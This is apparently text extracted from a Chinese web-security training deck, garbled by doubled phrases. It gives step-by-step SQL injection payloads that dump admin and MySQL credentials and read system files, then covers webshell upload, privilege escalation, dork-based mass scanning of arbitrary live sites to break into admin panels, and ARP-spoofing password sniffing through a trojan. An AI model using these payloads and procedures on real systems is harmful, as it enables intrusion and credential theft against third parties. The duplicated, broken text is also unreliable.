web安全專項技術(shù)培訓(xùn)

1、web安全安全漏洞利用手工注入工具使用答疑討論漏洞描述利用演示安全防護(hù) 商達(dá)訊網(wǎng)店系統(tǒng)提供免費網(wǎng)上商城的搭建，其代碼從創(chuàng)立商達(dá)訊網(wǎng)店系統(tǒng)提供免費網(wǎng)上商城的搭建，其代碼從創(chuàng)立初期，存在多處注入，作為我們研究初期，存在多處注入，作為我們研究webweb安全的入門，我們以安全的入門，我們以這款免費的商城代碼進(jìn)行注入分析。這款免費的商城代碼進(jìn)行注入分析。 u查詢訂單頁面中，對輸入的查詢函數(shù)缺乏過濾查詢訂單頁面中，對輸入的查詢函數(shù)缺乏過濾 導(dǎo)致注入導(dǎo)致注入 注入，即將我們的數(shù)據(jù)放進(jìn)數(shù)據(jù)庫執(zhí)行，非法注入，將導(dǎo)致注入，即將我們的數(shù)據(jù)放進(jìn)數(shù)據(jù)庫執(zhí)行，非法注入，將導(dǎo)致hackerhacker操作數(shù)據(jù)庫完成他想要

2、做的任何事情。操作數(shù)據(jù)庫完成他想要做的任何事情。 針對訂單頁面查詢，輸入針對訂單頁面查詢，輸入 union select 1,admin,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,userpassword,24 from admin where = 注入的防護(hù)，即將傳遞給數(shù)據(jù)庫的所有數(shù)據(jù)進(jìn)行驗證輸入。注入的防護(hù)，即將傳遞給數(shù)據(jù)庫的所有數(shù)據(jù)進(jìn)行驗證輸入。 分析代碼，將分析代碼，將goodsgoods賦值前進(jìn)行驗證過濾，如設(shè)置賦值前進(jìn)行驗證過濾，如設(shè)置goods=sqlcheckgoods=sqlcheck（request.form(

3、“searchkey”)request.form(“searchkey”)）漏洞描述利用演示安全防護(hù)文件包含漏洞指的是可以通過URL定義和改寫PHP變量，從而演變成操控網(wǎng)頁腳本，加載其它文件的控制流程，其核心思路必須使用register_globals=on漏洞代碼：allow_url_fopen = Onallow_url_include = On漏洞利用：目標(biāo)注入點查找猜測數(shù)據(jù)庫表、字段、數(shù)據(jù)內(nèi)容尋找后臺上傳Webshell利用演示目標(biāo)注入點查通過我們 and 1=1 和and 1=2 我們判斷頁面是典型數(shù)字類型注入點此處省略1W字利用演示上傳Webshell這里我們用到方法是上傳小馬，然

4、后通過數(shù)據(jù)庫備份功能修改上傳小馬后綴名稱 之后上次大馬。通過大馬來提權(quán)。詳細(xì)方法如圖利用演示上傳Webshell上傳小馬 Jep.jpg注入原理分析：注入原理分析：1）查詢注入點，基本測試2）確認(rèn)后，查order by 數(shù)字-正常則表示字段大于等于此數(shù)字3）查詢出能爆信息的字段 and 1=2 union select 1，2，3，4，5，6/* or - （假設(shè)字段長度為6） 判斷注入點權(quán)限 ：and (select count(*) from mysql.user)0/*4）查詢各種數(shù)據(jù)信息，假設(shè)爆出字段5顯示信息，則將5換成需要顯示的信息5=version（）/user（）5）主要根據(jù)m

5、ysql最新的 information_schema庫的表中，從中查詢信息，如 and 1=2 union select 1，2，3，4， group_concat(schema_name)，6 from information_schema.schemata， 查詢各數(shù)據(jù)庫名稱6）查詢你想查詢庫中的所有表名，如已經(jīng)查詢到包含phpbb數(shù)據(jù)庫，想看其中的表，則將phpbb換成16進(jìn)制進(jìn)行查詢，如and 1=2 union select 1，2，3，4，group_concat(table_name)，6 from information_schema.tables where table_sc

6、hema=0 x70687062627）如果表名太多，可通過substring（string，subnumber，number）分離表名，即 substring（group_concat(table_name)，1，50）8）查詢出你感興趣的表名后，可繼續(xù)查列名and1=2/*/union/*/select/*/1,2,3,group_concat(COLUMN_NAME),5,6/*/from/*/information_schema.COLUMNS/*/where/*/TABLE_NAME= 0 x62685F61646D696E9）庫，表，列名皆知，則可查詢具體信息：and 1=2 /*

7、/union/*/select/*/1,2,3, group_concat(Host,User,Password),5,6/*/from/*/mysql.user 本地過程演示注入原理分析：本地過程演示注入原理分析： 本地搭建測試環(huán)境 以某書籍上表明的問題測試文件為例，其給出一個user參數(shù)，未進(jìn)行任何過濾，問題代碼如下: 一步步測試，首先查看當(dāng)前表有多少個字段，當(dāng)order by 38時出現(xiàn)無此列，order by 37正常 ，則肯定字段數(shù)為37.本地過程演示注入原理分析：本地過程演示注入原理分析： 現(xiàn)在可以屏蔽正確的查詢信息，以此回顯我們的查詢。先查詢基本信息，如下所示: 本地過程演示注入

8、原理分析：本地過程演示注入原理分析： 可以看出查詢正常，支持union查詢并在多處支持回顯，現(xiàn)在我們查詢當(dāng)前網(wǎng)站服務(wù)器上有多少個數(shù)據(jù)庫，各是什么，必要時，以substring（）讀取 本地過程演示注入原理分析：本地過程演示注入原理分析： 本例查詢joomla數(shù)據(jù)庫，直接查詢數(shù)據(jù)庫會被編碼為不識別，使用16進(jìn)制加密joomla，查詢此數(shù)據(jù)庫的表情況： 此庫中表比較多，那么需要以substring（）來分步讀取 本地過程演示注入原理分析：本地過程演示注入原理分析： 有理由相信jos_users表中存放著關(guān)鍵信息，查詢此表的字段信息： 本地過程演示注入原理分析：本地過程演示注入原理分析： 很明顯，管

9、理員的賬戶密碼，能夠獲取了： 本地過程演示注入原理分析：本地過程演示注入原理分析： 接下來該做什么了？將密文解密，登錄后臺，執(zhí)行操作，獲取shell，提權(quán)，獲取服務(wù)器權(quán)限。 還有沒有更好的途徑？ 數(shù)據(jù)庫結(jié)構(gòu)分析：數(shù)據(jù)庫結(jié)構(gòu)分析：Mysql庫：Information_schema庫：Load_file 函數(shù)1）語法：需要file權(quán)限 select load_file(/etc/password)-select%201,2,3,4,5,load_file(0 x2F6574632F68747470642F636F6E662F68747470642E636F6E66),7 -必要時 以/*/代替空格

10、2）各常用配置文件：MYSQL注入中，load_file()函數(shù)在獲得webshell以及提權(quán)過程中起著十分重要的作用，常被用來讀取各種配置文件，如：/usr/local/app/php5/lib/php.ini /PHP相關(guān)設(shè)置/etc/httpd/conf/httpd.conf / apache配置文件/etc/f /mysql的配置文件c:mysqldatamysqluser.MYD /存儲了mysql.user表中的數(shù)據(jù)庫連接密碼c:Program FilesRhinoSServ-UServUDaemon.ini /存儲了虛擬主機(jī)網(wǎng)站路徑和密碼等等。實際上，load_file()的作用

11、不止于此，它還可以用來讀取系統(tǒng)中的二進(jìn)制文件，c:Program Files Serv-UServUAdmin.exe /6.0版本以前的serv-u管理員密碼存儲于此C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere*.cif文件/存儲了pcAnywhere的登陸密碼Into outfile 函數(shù)1） magic_quotes_gpc必須為off，否則outfile的“ ” 會被轉(zhuǎn)義，而此函數(shù)的符號不能被其它加密替代2）獲得物理路徑(into outfile 物理路徑) 這樣才能寫對目錄3）能夠使用union

12、 (也就是說需要MYSQL3以上的版本)4） 就是MYSQL用戶擁有file_priv權(quán)限(不然就不能寫文件 或者把文件內(nèi)容讀出)5）對web目錄有寫權(quán)限 MS的系統(tǒng)一般都有權(quán)限,但是LINUX通常都是rwxr-xr-x 也就是說組跟其他用戶都沒有權(quán)限寫操作.-可備份到上傳目錄 (select count(*) from MySQL.user)0- （寫權(quán)限判斷 linux下寫入到上傳目錄）示例：數(shù)據(jù)庫密碼的本地恢復(fù)：Web應(yīng)用文件讀?。?多在conn.php，config.php等文件中存儲著數(shù)據(jù)庫的明文連接密碼Windows下密碼恢復(fù)：打開命令行窗口，停止mysql服務(wù)： Net stop

13、 mysql啟動mysql，一般到mysql的安裝路徑，找到 mysqld-nt.exe執(zhí)行：mysqld-nt -skip-grant-tables另外打開一個命令行窗口，進(jìn)入相應(yīng)目錄下，執(zhí)行mysqluse mysqlupdate user set password=PASSWORD(new_pass) where user=root;flush privileges;exit用Ctrl+Alt+Del，找到mysqld-nt的進(jìn)程殺掉它，在重新啟動mysql-nt服務(wù)，就可以用新密碼登錄了Linux下密碼恢復(fù)： mysql一般位于 /var/lib/mysql/mysql 存儲用戶的文件

14、數(shù)據(jù) 于 user.MYD 一 覆蓋文件 (覆蓋前 此文件最好備份一份 以防意外) 然后 再修改任意密碼 慎用! mysqluse mysqlmysqlupdate user set Password=PASSWORD(xxxxxx) where User=root 二 無認(rèn)證登錄首先,關(guān)閉服務(wù) /etc/init.d/mysql stop然后安全模式登錄: /usr/bin/safe_mysqld -skip-grant-tables 現(xiàn)在可以改密碼了:/var/lib/mysql/mysql use mysqlupdate user set password=PASSWORD(new_pa

15、ss) where user=root;flush privileges;再殺掉此時的進(jìn)程,killall -TERM mysqld 重啟服務(wù) ,新密碼登錄1.準(zhǔn)備掃描數(shù)據(jù)準(zhǔn)備掃描數(shù)據(jù)在谷歌和百度里面高級搜索，打開百度或者谷歌，“（我以百度為例來進(jìn)行這個步驟）選擇“高級”在“包含以下全部的關(guān)鍵詞”中輸入 “inurl:asp=XXXX”(XXXX可以是任意的數(shù)字)在”選擇搜索結(jié)果顯示的條數(shù)“中選擇”每頁顯示100條“然后點擊“百度一下”，在彈 出的窗口中復(fù)制出完整的URL地址。2.掃描注入點掃描注入點打開啊D注入工具，選擇”注入檢測“的”掃描注入點“子項。在檢測網(wǎng)址中粘貼剛復(fù)制出來的URL地址

16、，單擊“打開網(wǎng)頁” 或者直接回車。此時啊D注入工具會掃該鏈接下的所有可用注入點。注入點會在界面的下方的“可用注入點”列表框中以紅色字體顯示。(剛打開時有可能沒 有可用注入點，因為此時此工具正在掃描注入點，隨著掃描的時間推移就會有更多的注入點。如果當(dāng)掃描結(jié)束了沒有注入點的話就要更換“inurl: asp=XXXX”的數(shù)字了，再重復(fù)上面的步驟直到出現(xiàn)可用的注入點才能進(jìn)行下面的步驟。)3.注入點檢測注入點檢測雙擊一條掃描出來的URL地址，界面自動跳轉(zhuǎn)到“SQL注入檢測”，單擊“檢測”按鈕。（如果提示“這個鏈接不能SQL注入！請選擇別的鏈接”，則重新?lián)Q一條鏈接再執(zhí)行本步驟。直到不出現(xiàn)提示， 左下角提示

17、“檢測完成”。）可以得出數(shù)據(jù)庫類型。4.“檢測表段檢測表段”和和“檢測字段檢測字段”此時會掃描數(shù)據(jù)庫中可注入的數(shù)據(jù)表。當(dāng)檢測完成之后沒有可用的表時重新執(zhí)行步驟3，直到有可用的數(shù)據(jù)表。這里我們選擇“admin”這個表段進(jìn)行字段檢測。勾選要檢測的字段進(jìn)行內(nèi)容檢測。5.MD5解密解密將檢測得到的password字段中的內(nèi)容復(fù)制到MD5在線解密網(wǎng)站上解密。6.管理入口檢測管理入口檢測單擊“檢測管理入口”，檢測到的登陸入口會在“可用鏈接和目錄位置”的列表框中顯示。然后選擇一個匹配的鏈接輸入檢測到的內(nèi)容即可進(jìn)入網(wǎng)站的管理后臺。注：一條數(shù)據(jù)只能和該條數(shù)據(jù)關(guān)聯(lián)的頁面匹配，如果在一個界面登陸不成功則考慮換一個鏈

18、接從新來過。登錄后臺登錄后臺Hijack是一個具有ARP欺騙功能的小工具，可以進(jìn)行遠(yuǎn)程滲透入侵。hijack解壓后，里面有3個文件：“hijack.exe”、“winpcap.exe”和“old.exe”。其中“hijack.exe”和“winpcap.exe”是必需的。前者是程序主文件，后者是嗅探所需Winpcap數(shù)據(jù)包的自解壓版本。將文件上傳到遠(yuǎn)程主機(jī)上，這里以C盤根目錄為例。在使用hijack.exe工具進(jìn)行滲透入侵前，必須安裝winpcap組件入侵控制的主機(jī)，可能是單獨的一臺主機(jī)，也可能位于某個網(wǎng)絡(luò)中；主機(jī)上可能只安裝了一塊網(wǎng)卡，也可能安裝了多塊網(wǎng)塊-全面地了解遠(yuǎn)程主機(jī)上的網(wǎng)絡(luò)信息是進(jìn)

19、一步滲透入侵攻擊前所必需的。在遠(yuǎn)程控制木馬的命令控制窗口中，執(zhí)行命令： hijack -L 可以看到遠(yuǎn)程主機(jī)上網(wǎng)卡的設(shè)備名、IP地址、MAC物理地址和子網(wǎng)掩碼等各種網(wǎng)絡(luò)信息，如圖所示。其中，比較重要的是idx列顯示的信息，也就是網(wǎng)卡索引號。如果是單網(wǎng)卡，那么網(wǎng)卡索引號為1。掃描遠(yuǎn)程主機(jī)子網(wǎng)中所有的主機(jī)IP地址，命令格式為： hijack exe -d 網(wǎng)卡索引號 -s 可以從遠(yuǎn)程主機(jī)所在的子網(wǎng)中掃描并顯示所有主機(jī)的IP地址，以及其網(wǎng)卡的MAC物理地址。這里可以看到，在子網(wǎng)中有5臺主機(jī)。嗅探所有“172.16.2.*網(wǎng)段的主機(jī)與服務(wù)器02之間的網(wǎng)絡(luò)信息數(shù)據(jù)，并從中捕獲密碼，保存在pass.log文件中。 hijack -d 1 -O pass.log 172